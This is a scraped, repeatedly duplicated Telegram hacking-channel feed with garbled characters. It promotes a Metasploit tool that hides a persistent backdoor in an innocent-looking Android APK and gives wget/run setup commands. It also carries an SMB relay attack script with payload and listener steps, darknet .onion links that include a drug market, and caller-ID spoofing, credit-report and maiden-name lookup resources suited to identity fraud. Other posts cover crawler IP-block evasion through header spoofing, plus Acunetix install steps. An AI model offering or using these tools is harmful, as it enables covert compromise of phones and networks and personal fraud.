β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Metasploit-Android
This module uses the Metasploit framework built into Kali-Linux to create and Android APK that will allow a back door into the users phone.
The script creates the malicious APK file and embeds it into a normal, unsuspicious APK that when opened, will automatically trigger a Perl script to create a persistent backdoor into the users phone. This can be done in two ways, over your local area network (LAN), or you can open a port for the data to be sent to and listen on the local binding for the data coming in. These options can be specified during the process of the script creating the APK.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) This tool should run under most versions of Linux but is optimized for working on Kali. The setup is very straight-forward just copy and paste the following code into a terminal:
wget https://raw.githubusercontent.com/AaronVigal/Metasploit-Android/master/setup
2) sudo chmod +x setup
3) sudo ./setup
4) cd ~/Desktop/Metasplot/Android
5) sudo ./exploit
6) The setup file checks/installs the following dependencies:
Metasploit Framework
Ruby
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Metasploit-Android
This module uses the Metasploit framework built into Kali-Linux to create and Android APK that will allow a back door into the users phone.
The script creates the malicious APK file and embeds it into a normal, unsuspicious APK that when opened, will automatically trigger a Perl script to create a persistent backdoor into the users phone. This can be done in two ways, over your local area network (LAN), or you can open a port for the data to be sent to and listen on the local binding for the data coming in. These options can be specified during the process of the script creating the APK.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) This tool should run under most versions of Linux but is optimized for working on Kali. The setup is very straight-forward just copy and paste the following code into a terminal:
wget https://raw.githubusercontent.com/AaronVigal/Metasploit-Android/master/setup
2) sudo chmod +x setup
3) sudo ./setup
4) cd ~/Desktop/Metasplot/Android
5) sudo ./exploit
6) The setup file checks/installs the following dependencies:
Metasploit Framework
Ruby
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Cyber attack on the website and servers of the insurance company Shirbit; Information on policyholders leaked to the network
#CyberAttacks
#CyberAttacks
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
New .onion legit links:
BRCHAN http://brchanansdnhvvnm.onion/ online
Neboard http://neboardo3svhysmd.onion/ online
Π‘Π»ΠΎΠ²Π΅ΡΠ½ΡΠΉ ΠΠΎΠ³Π°ΡΡΡΡ http://sblib3fk2gryb46d.onion/ online
HYDRA http://hydraruzxpnew4af.onion/ online
Mail2Tor@onion http://mail2tor2zyjdctd.onion/ online
Stronghold Paste http://nzxj65x32vh2fkhk.onion/ online
BODY TO MIND http://bodytomind5hql5r.onion/ offline
UD http://underdj5ziov3ic7.onion/ online
Beehive http://beehive6ratfqulk.onion/ online
Sauf.Γ§a http://saufca42reinzasa.onion/ online
The Hidden Wiki http://kpvz7ki2lzvnwve7.onion/ online
Radical Militant Library http://c3jemx2ube5v5zpg.onion/ offline
Verified.VC β only checked people
β β β Uππ»βΊπ«Δπ¬πβ β β β
New .onion legit links:
BRCHAN http://brchanansdnhvvnm.onion/ online
Neboard http://neboardo3svhysmd.onion/ online
Π‘Π»ΠΎΠ²Π΅ΡΠ½ΡΠΉ ΠΠΎΠ³Π°ΡΡΡΡ http://sblib3fk2gryb46d.onion/ online
HYDRA http://hydraruzxpnew4af.onion/ online
Mail2Tor@onion http://mail2tor2zyjdctd.onion/ online
Stronghold Paste http://nzxj65x32vh2fkhk.onion/ online
BODY TO MIND http://bodytomind5hql5r.onion/ offline
UD http://underdj5ziov3ic7.onion/ online
Beehive http://beehive6ratfqulk.onion/ online
Sauf.Γ§a http://saufca42reinzasa.onion/ online
The Hidden Wiki http://kpvz7ki2lzvnwve7.onion/ online
Radical Militant Library http://c3jemx2ube5v5zpg.onion/ offline
Verified.VC β only checked people
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Fitbit provides paid health promotion service in Japan, JMDC exclusively sells for corporations.
#Updates
#Updates
β β β Uππ»βΊπ«Δπ¬πβ β β β
Some helpfull resources:
Zip Code Search
http://www.findlinks.com/
http://zipinfo.com/search/zipcode.htm
http://www.addresses.com/
http://www.mongabay.com/igapo/
Send Fax Online
efax.com
j2.com
send2fax.com
rapidfax.comfax1.com
k7.net
Credit Reports
https://www.mycreditkeeper.com
https://secure.creditreport.com
https://qspace.iplace.com
Phone Redirect*"
http://www.tollfreeforwarding.com
http://www.Spoofcall.com
USA phone number search**
http://www.reversephonedetective.com
MMN search
ancestry.com
from random channel
β β β Uππ»βΊπ«Δπ¬πβ β β β
Some helpfull resources:
Zip Code Search
http://www.findlinks.com/
http://zipinfo.com/search/zipcode.htm
http://www.addresses.com/
http://www.mongabay.com/igapo/
Send Fax Online
efax.com
j2.com
send2fax.com
rapidfax.comfax1.com
k7.net
Credit Reports
https://www.mycreditkeeper.com
https://secure.creditreport.com
https://qspace.iplace.com
Phone Redirect*"
http://www.tollfreeforwarding.com
http://www.Spoofcall.com
USA phone number search**
http://www.reversephonedetective.com
MMN search
ancestry.com
from random channel
β β β Uππ»βΊπ«Δπ¬πβ β β β
Zipinfo
Free zipcode lookup with area code, county, latitude, longitude, MSA, PMSA, population, FIPS code, and time zone. Updated monthly.
Free zipcode lookup with areacode, county, latitude, longitude, MSA, PMSA, population, FIPS code, and timezone. Updated monthly.
Forwarded from UNDERCODE NEWS
Breaking the information in Shirbit: Fear of leaking personal details of senior civil servants.
#Updates
#Updates
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SMB Relay Attack Script:
1) clone https://github.com/Jsitech/relayer
2) cd relayer
3) ./relayer.sh
4) to use :
a)
π¦SMB Relay Attack Script:
1) clone https://github.com/Jsitech/relayer
2) cd relayer
3) ./relayer.sh
4) to use :
a)
Scan for SMB Systems on Target Network and List those with SMB signing Disabled
b) User selects system to Relay the authentication attempts to
c) User selects where to set the Listener for incoming connections
d) User selects payload
e) Relayer creates payload and sets up Responder and SMBRelayX
f)Wait for connection attempts to your attacking machine and check Listener
β β β Uππ»βΊπ«Δπ¬πβ β β βGitHub
GitHub - Jsitech/relayer: SMB Relay Attack Script
SMB Relay Attack Script. Contribute to Jsitech/relayer development by creating an account on GitHub.
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Hanmi Pharm wins the first K-ICT information protection excellence award in the pharmaceutical and bio industry.
#international
#international
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦When using crawlers to collect websites, several methods to solve blocked IP
Method 1.
Due to the company's project needs, we have collected google map data and some large-scale website data.
The experience is as follows:
1. IP must be required, as @alswl said is very correct, ADSL. If you have the conditions, you can actually apply for extra IP from the computer room.
2. Deploy a proxy server on the machine with an external network IP.
3. Your program uses rotation training to replace the proxy server to access the website you want to collect.
Benefits:
1. The program logic changes little, only the agent function is needed.
2. According to the blocking rules of the other party's website, you only need to add more agents.
3. Even if the specific IP is blocked, you can directly log off the proxy server and it will be OK, and the program logic does not need to be changed.
Method 2.
Some websites have weak preventive measures. You can disguise the IP and modify X-Forwarded-for (it looks like this spelling...) to bypass it.
For most websites, if you want to crawl frequently, you still need more IPs. The solution I prefer is that foreign VPSs are equipped with multiple IPs, and IP switching is realized through default gateway switching, which is much more efficient than HTTP proxy, and is estimated to be more efficient than ADSL switching in most cases.
Method 3.
ADSL + script, monitor whether it is blocked, and then constantly switch ip
settings to query frequency limits. The
orthodox approach is to call the service interface provided by the website.
Method 4. People
with more than 8 years of crawling experience tell you that domestic ADSL is the kingly way. Apply for more lines and distribute them in different telecom districts. It is better to be able to cross provinces and cities. Write your own disconnection redial components. Write your own dynamic IP tracking service, remote hardware reset (mainly for ADSL modems to prevent its downtime), other task allocation, data recovery, are not a big problem. Mine has been running stably for several years, and it's done!
Method 5.
1 User agent disguise and rotation
2 Use proxy ip and rotation
3 Cookies processing, some websites have a looser policy on login users.
Friendly reminder: Consider the burden of crawlers on other websites, be a responsible crawler :)
Method 6.
As much as possible The simulated user behavior:
1. The UserAgent is changed frequently;
2. The visit time interval is set longer, and the visit time is set to a random number;
3. The order of visiting pages can also be random.
The basis for website blocking is generally unit The number of visits to a specific IP within a period of time.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦When using crawlers to collect websites, several methods to solve blocked IP
Method 1.
Due to the company's project needs, we have collected google map data and some large-scale website data.
The experience is as follows:
1. IP must be required, as @alswl said is very correct, ADSL. If you have the conditions, you can actually apply for extra IP from the computer room.
2. Deploy a proxy server on the machine with an external network IP.
3. Your program uses rotation training to replace the proxy server to access the website you want to collect.
Benefits:
1. The program logic changes little, only the agent function is needed.
2. According to the blocking rules of the other party's website, you only need to add more agents.
3. Even if the specific IP is blocked, you can directly log off the proxy server and it will be OK, and the program logic does not need to be changed.
Method 2.
Some websites have weak preventive measures. You can disguise the IP and modify X-Forwarded-for (it looks like this spelling...) to bypass it.
For most websites, if you want to crawl frequently, you still need more IPs. The solution I prefer is that foreign VPSs are equipped with multiple IPs, and IP switching is realized through default gateway switching, which is much more efficient than HTTP proxy, and is estimated to be more efficient than ADSL switching in most cases.
Method 3.
ADSL + script, monitor whether it is blocked, and then constantly switch ip
settings to query frequency limits. The
orthodox approach is to call the service interface provided by the website.
Method 4. People
with more than 8 years of crawling experience tell you that domestic ADSL is the kingly way. Apply for more lines and distribute them in different telecom districts. It is better to be able to cross provinces and cities. Write your own disconnection redial components. Write your own dynamic IP tracking service, remote hardware reset (mainly for ADSL modems to prevent its downtime), other task allocation, data recovery, are not a big problem. Mine has been running stably for several years, and it's done!
Method 5.
1 User agent disguise and rotation
2 Use proxy ip and rotation
3 Cookies processing, some websites have a looser policy on login users.
Friendly reminder: Consider the burden of crawlers on other websites, be a responsible crawler :)
Method 6.
As much as possible The simulated user behavior:
1. The UserAgent is changed frequently;
2. The visit time interval is set longer, and the visit time is set to a random number;
3. The order of visiting pages can also be random.
The basis for website blocking is generally unit The number of visits to a specific IP within a period of time.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
The British have spent millions dollars per a day on smartphone gaming. At the top of the list: a game in Israel
#international
#international
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π₯ How to install Acutenix on Ubuntu 18.04:
Automatically tests the site for XSS, SQLi and more than 4500 vulnerabilities
Reduces false positives with gray box scanning that analyzes code at runtime
Tests on over 1200 WordPress, Drupal and Joomla! specific vulnerabilities
Scans HTML5, JavaScript, Single Page Applications and RESTful web services
Vulnerability Management and Compliance Reporting
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
These dependencies apply if you are running a headless Ubuntu 18.04 server.
sudo apt install libxdamage1 libgtk-3-0 libasound2 libnss3 libxss1 libx11-xcb1
Installing Acutenix on Ubuntu 18.04
Change to the directory where you copied the installer. For instance,
cd / home / amos /
Then you need to make the Acutenix installer script executable by running the command below;
chmod + x acunetix_trial.sh
Run the installer by running the command below;
sudo ./acunetix_trial.sh
After launching the installer, press Enter, scroll through the Acutenix license agreement and accept the license to proceed with the installation.
Acunetix Installer Version: v_190227132, Copyright (c) Acunetix
-------------------------------------------------- ----------
Checking os ...
Checking for dependencies ...
Please read the following License Agreement. You must accept the terms of this
agreement before continuing with the installation.
press ENTER to continue
>>> ENTER
...
Accept the license terms? [yes | no]
[no] >>> yes
Set the hostname of the server used to access the Acutenix user interface.
You can press ENTER to accept the default.
Configuring acunetix user ...
Creating user acunetix.
By default the Acunetix will be installed to /home/acunetix/.acunetix_trial
Checking database port ...
Checking backend port ...
Configuring hostname ...
Insert new hostname, or leave blank to use acutenix.example.com
Hostname [acutenix.example.com]: ENTER
Set the administrator credentials, email account (used as username), and password.
The password must be at least 8 characters long and contain at least 3 of the following characters: 1 number, 1 lowercase letter, 1 uppercase letter, and 1 special character.
Configuring the master user ...
Email: <Valid Email ID>
Password: P @ ssWord1
Password again: P @ ssWord1
Initializing file system ...
Extracting files to /home/acunetix/.acunetix_trial ....
The installation will then proceed without issue.
After the installation is complete, you can access the Acutenix user interface using the URL provided at the end of the installation.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π₯ How to install Acutenix on Ubuntu 18.04:
Automatically tests the site for XSS, SQLi and more than 4500 vulnerabilities
Reduces false positives with gray box scanning that analyzes code at runtime
Tests on over 1200 WordPress, Drupal and Joomla! specific vulnerabilities
Scans HTML5, JavaScript, Single Page Applications and RESTful web services
Vulnerability Management and Compliance Reporting
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
These dependencies apply if you are running a headless Ubuntu 18.04 server.
sudo apt install libxdamage1 libgtk-3-0 libasound2 libnss3 libxss1 libx11-xcb1
Installing Acutenix on Ubuntu 18.04
Change to the directory where you copied the installer. For instance,
cd / home / amos /
Then you need to make the Acutenix installer script executable by running the command below;
chmod + x acunetix_trial.sh
Run the installer by running the command below;
sudo ./acunetix_trial.sh
After launching the installer, press Enter, scroll through the Acutenix license agreement and accept the license to proceed with the installation.
Acunetix Installer Version: v_190227132, Copyright (c) Acunetix
-------------------------------------------------- ----------
Checking os ...
Checking for dependencies ...
Please read the following License Agreement. You must accept the terms of this
agreement before continuing with the installation.
press ENTER to continue
>>> ENTER
...
Accept the license terms? [yes | no]
[no] >>> yes
Set the hostname of the server used to access the Acutenix user interface.
You can press ENTER to accept the default.
Configuring acunetix user ...
Creating user acunetix.
By default the Acunetix will be installed to /home/acunetix/.acunetix_trial
Checking database port ...
Checking backend port ...
Configuring hostname ...
Insert new hostname, or leave blank to use acutenix.example.com
Hostname [acutenix.example.com]: ENTER
Set the administrator credentials, email account (used as username), and password.
The password must be at least 8 characters long and contain at least 3 of the following characters: 1 number, 1 lowercase letter, 1 uppercase letter, and 1 special character.
Configuring the master user ...
Email: <Valid Email ID>
Password: P @ ssWord1
Password again: P @ ssWord1
Initializing file system ...
Extracting files to /home/acunetix/.acunetix_trial ....
The installation will then proceed without issue.
After the installation is complete, you can access the Acutenix user interface using the URL provided at the end of the installation.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
